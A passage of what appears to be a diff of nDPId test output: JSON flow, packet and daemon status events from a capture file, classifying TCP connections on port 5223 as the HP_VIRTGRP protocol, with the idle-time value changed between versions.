-00690{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":31,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1614852331255,"flow_last_seen":1614852568996,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":163,"flow_tot_l4_payload_len":522,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1614861898114,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"160.44.194.66","src_port":46570,"dst_port":5223,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HP_VIRTGRP","breed":"Acceptable","category":"Network"}} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":31,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1614861998723,"flow_last_seen":1614861998723,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1614861998723,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"160.44.194.66","src_port":59324,"dst_port":5223,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":31,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1614861998723,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1614861998723,"pkt":"eJS0JASgYDjgxTWgCABFAAA8bUJAAD8GqP7AqAJkoCzCQue8FGe3KQNZAAAAAKAC\/\/8fjgAAAgQFtAQCCAoAAkxNAAAAAAEDAwg="} -00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":32,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1614861998752,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1614861998752,"pkt":"YDjgxTWgeJS0JASgCABFAAAsAABAADQGIVGgLMJCwKgCZBRn57x0ZsiytykDWmASchAM0gAAAgQFrAAA"} -00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":33,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1614861998755,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1614861998755,"pkt":"eJS0JASgYDjgxTWgCABFAAAobUNAAD8GqRHAqAJkoCzCQue8FGe3KQNadGbIs1AQ\/\/+WlwAA"} -00650{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":34,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1614861998723,"flow_last_seen":1614861998769,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":132,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1614861998769,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"160.44.194.66","src_port":59324,"dst_port":5223,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HP_VIRTGRP","breed":"Acceptable","category":"Network"}} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":16,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1614861892925,"flow_last_seen":1614861892925,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1614861892925,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"160.44.194.66","src_port":59200,"dst_port":5223,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":16,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1614861892925,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1614861892925,"pkt":"eJS0JASgYDjgxTWgCABFAAA85WdAAD8GMNnAqAJkoCzCQudAFGcyIeJoAAAAAKAC\/\/9iNQAAAgQFtAQCCAoAALAcAAAAAAEDAwg="} +00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":17,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1614861892952,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1614861892952,"pkt":"YDjgxTWgeJS0JASgCABFAAAsAABAADQGIVGgLMJCwKgCZBRn50AGwaaHMiHiaWASchBDFwAAAgQFrAAA"} +00454{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":18,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1614861892955,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1614861892955,"pkt":"eJS0JASgYDjgxTWgCABFAAAo5WhAAD8GMOzAqAJkoCzCQudAFGcyIeJpBsGmiFAQ\/\/\/M3AAA"} +00650{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":19,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1614861892925,"flow_last_seen":1614861893049,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":132,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1614861893049,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"160.44.194.66","src_port":59200,"dst_port":5223,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HP_VIRTGRP","breed":"Acceptable","category":"Network"}} +00690{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":31,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1614852331255,"flow_last_seen":1614852568996,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":163,"flow_tot_l4_payload_len":522,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1614861898114,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"160.44.194.66","src_port":46570,"dst_port":5223,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HP_VIRTGRP","breed":"Acceptable","category":"Network"}} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":31,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1614861998723,"flow_last_seen":1614861998723,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1614861998723,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"160.44.194.66","src_port":59324,"dst_port":5223,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":31,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1614861998723,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1614861998723,"pkt":"eJS0JASgYDjgxTWgCABFAAA8bUJAAD8GqP7AqAJkoCzCQue8FGe3KQNZAAAAAKAC\/\/8fjgAAAgQFtAQCCAoAAkxNAAAAAAEDAwg="} +00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":32,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1614861998752,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1614861998752,"pkt":"YDjgxTWgeJS0JASgCABFAAAsAABAADQGIVGgLMJCwKgCZBRn57x0ZsiytykDWmASchAM0gAAAgQFrAAA"} +00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":33,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1614861998755,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1614861998755,"pkt":"eJS0JASgYDjgxTWgCABFAAAobUNAAD8GqRHAqAJkoCzCQue8FGe3KQNadGbIs1AQ\/\/+WlwAA"} +00650{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":34,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1614861998723,"flow_last_seen":1614861998769,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":132,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1614861998769,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"160.44.194.66","src_port":59324,"dst_port":5223,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HP_VIRTGRP","breed":"Acceptable","category":"Network"}} 00553{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":46,"source":"hpvirtgrp.pcap","alias":"nDPId-test","packets-captured":46,"packets-processed":45,"total-skipped-flows":0,"total-l4-data-len":1566,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":3,"total-detection-updates":0,"total-updates":0,"current-active-flows":2,"total-active-flows":3,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":20,"global_ts_msec":1614876808445} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":46,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1614876808445,"flow_last_seen":1614876808445,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1614876808445,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"160.44.194.66","src_port":59920,"dst_port":5223,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":46,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1614876808445,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1614876808445,"pkt":"eJS0JASgYDjgxTWgCABFAAA8MDtAAD8G5gXAqAJkoCzCQuoQFGeH4ylZAAAAAKAC\/\/91KwAAAgQFtAQCCAoAZP0\/AAAAAAEDAwg="} -00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":47,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1614876808474,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1614876808474,"pkt":"YDjgxTWgeJS0JASgCABFAAAsAABAADQGIVGgLMJCwKgCZBRn6hA0hHo5h+MpWmASchCiHwAAAgQFrAAA"} -00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":48,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":3,"flow_last_seen":1614876808478,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1614876808478,"pkt":"eJS0JASgYDjgxTWgCABFAAAoMDxAAD8G5hjAqAJkoCzCQuoQFGeH4ylaNIR6OlAQ\/\/8r5QAA"} -00650{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":49,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1614876808445,"flow_last_seen":1614876811615,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":132,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1614876811615,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"160.44.194.66","src_port":59920,"dst_port":5223,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HP_VIRTGRP","breed":"Acceptable","category":"Network"}} -00690{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":57,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1614861892925,"flow_last_seen":1614861898114,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":163,"flow_tot_l4_payload_len":522,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1614876811951,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"160.44.194.66","src_port":59200,"dst_port":5223,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HP_VIRTGRP","breed":"Acceptable","category":"Network"}} -00690{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":57,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1614861998723,"flow_last_seen":1614862060713,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":163,"flow_tot_l4_payload_len":522,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1614876811951,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"160.44.194.66","src_port":59324,"dst_port":5223,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HP_VIRTGRP","breed":"Acceptable","category":"Network"}} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":46,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1614876808445,"flow_last_seen":1614876808445,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1614876808445,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"160.44.194.66","src_port":59920,"dst_port":5223,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":46,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1614876808445,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1614876808445,"pkt":"eJS0JASgYDjgxTWgCABFAAA8MDtAAD8G5gXAqAJkoCzCQuoQFGeH4ylZAAAAAKAC\/\/91KwAAAgQFtAQCCAoAZP0\/AAAAAAEDAwg="} +00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":47,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1614876808474,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1614876808474,"pkt":"YDjgxTWgeJS0JASgCABFAAAsAABAADQGIVGgLMJCwKgCZBRn6hA0hHo5h+MpWmASchCiHwAAAgQFrAAA"} +00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":48,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":3,"flow_last_seen":1614876808478,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1614876808478,"pkt":"eJS0JASgYDjgxTWgCABFAAAoMDxAAD8G5hjAqAJkoCzCQuoQFGeH4ylaNIR6OlAQ\/\/8r5QAA"} +00650{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":49,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1614876808445,"flow_last_seen":1614876811615,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":132,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1614876811615,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"160.44.194.66","src_port":59920,"dst_port":5223,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HP_VIRTGRP","breed":"Acceptable","category":"Network"}} +00690{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":57,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1614861892925,"flow_last_seen":1614861898114,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":163,"flow_tot_l4_payload_len":522,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1614876811951,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"160.44.194.66","src_port":59200,"dst_port":5223,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HP_VIRTGRP","breed":"Acceptable","category":"Network"}} +00690{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":57,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1614861998723,"flow_last_seen":1614862060713,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":163,"flow_tot_l4_payload_len":522,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1614876811951,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"160.44.194.66","src_port":59324,"dst_port":5223,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HP_VIRTGRP","breed":"Acceptable","category":"Network"}} 00553{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":61,"source":"hpvirtgrp.pcap","alias":"nDPId-test","packets-captured":61,"packets-processed":60,"total-skipped-flows":0,"total-l4-data-len":2088,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":4,"total-detection-updates":0,"total-updates":0,"current-active-flows":1,"total-active-flows":4,"total-idle-flows":3,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":28,"global_ts_msec":1614877863379} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":61,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1614877863379,"flow_last_seen":1614877863379,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1614877863379,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"160.44.194.66","src_port":40152,"dst_port":5223,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":61,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1614877863379,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1614877863379,"pkt":"eJS0JASgYDjgxTWgCABFAAA8nQJAAD8GeT7AqAJkoCzCQpzYFGd4ZLUSAAAAAKAC\/\/8PXgAAAgQFtAQCCAoAcTP+AAAAAAEDAwg="} -00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":62,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":2,"flow_last_seen":1614877863406,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1614877863406,"pkt":"YDjgxTWgeJS0JASgCABFAAAsAABAADQGIVGgLMJCwKgCZBRnnNj+cl67eGS1E2ASchDErAAAAgQFrAAA"} -00454{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":63,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":3,"flow_last_seen":1614877863410,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1614877863410,"pkt":"eJS0JASgYDjgxTWgCABFAAAonQNAAD8GeVHAqAJkoCzCQpzYFGd4ZLUT\/nJevFAQ\/\/9OcgAA"} -00650{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":64,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1614877863379,"flow_last_seen":1614877863430,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":132,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1614877863430,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"160.44.194.66","src_port":40152,"dst_port":5223,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HP_VIRTGRP","breed":"Acceptable","category":"Network"}} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":61,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1614877863379,"flow_last_seen":1614877863379,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1614877863379,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"160.44.194.66","src_port":40152,"dst_port":5223,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":61,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1614877863379,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1614877863379,"pkt":"eJS0JASgYDjgxTWgCABFAAA8nQJAAD8GeT7AqAJkoCzCQpzYFGd4ZLUSAAAAAKAC\/\/8PXgAAAgQFtAQCCAoAcTP+AAAAAAEDAwg="} +00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":62,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":2,"flow_last_seen":1614877863406,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1614877863406,"pkt":"YDjgxTWgeJS0JASgCABFAAAsAABAADQGIVGgLMJCwKgCZBRnnNj+cl67eGS1E2ASchDErAAAAgQFrAAA"} +00454{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":63,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":3,"flow_last_seen":1614877863410,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1614877863410,"pkt":"eJS0JASgYDjgxTWgCABFAAAonQNAAD8GeVHAqAJkoCzCQpzYFGd4ZLUT\/nJevFAQ\/\/9OcgAA"} +00650{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":64,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1614877863379,"flow_last_seen":1614877863430,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":132,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1614877863430,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"160.44.194.66","src_port":40152,"dst_port":5223,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HP_VIRTGRP","breed":"Acceptable","category":"Network"}} 00553{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":76,"source":"hpvirtgrp.pcap","alias":"nDPId-test","packets-captured":76,"packets-processed":75,"total-skipped-flows":0,"total-l4-data-len":2866,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":5,"total-detection-updates":0,"total-updates":0,"current-active-flows":2,"total-active-flows":5,"total-idle-flows":3,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":34,"global_ts_msec":1614880256676} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":76,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1614880256676,"flow_last_seen":1614880256676,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1614880256676,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"160.44.194.66","src_port":35634,"dst_port":5223,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":76,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":1,"flow_last_seen":1614880256676,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1614880256676,"pkt":"eJS0JASgYDjgxTWgCABFAAA87gNAAD8GKD3AqAJkoCzCQosyFGf2oDFeAAAAAKAC\/\/9JKQAAAgQFtAQCCAoAlBEuAAAAAAEDAwg="} -00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":77,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":2,"flow_last_seen":1614880256703,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1614880256703,"pkt":"YDjgxTWgeJS0JASgCABFAAAsAABAADQGIVGgLMJCwKgCZBRnizKJqg+b9qAxX2ASchCfswAAAgQFrAAA"} 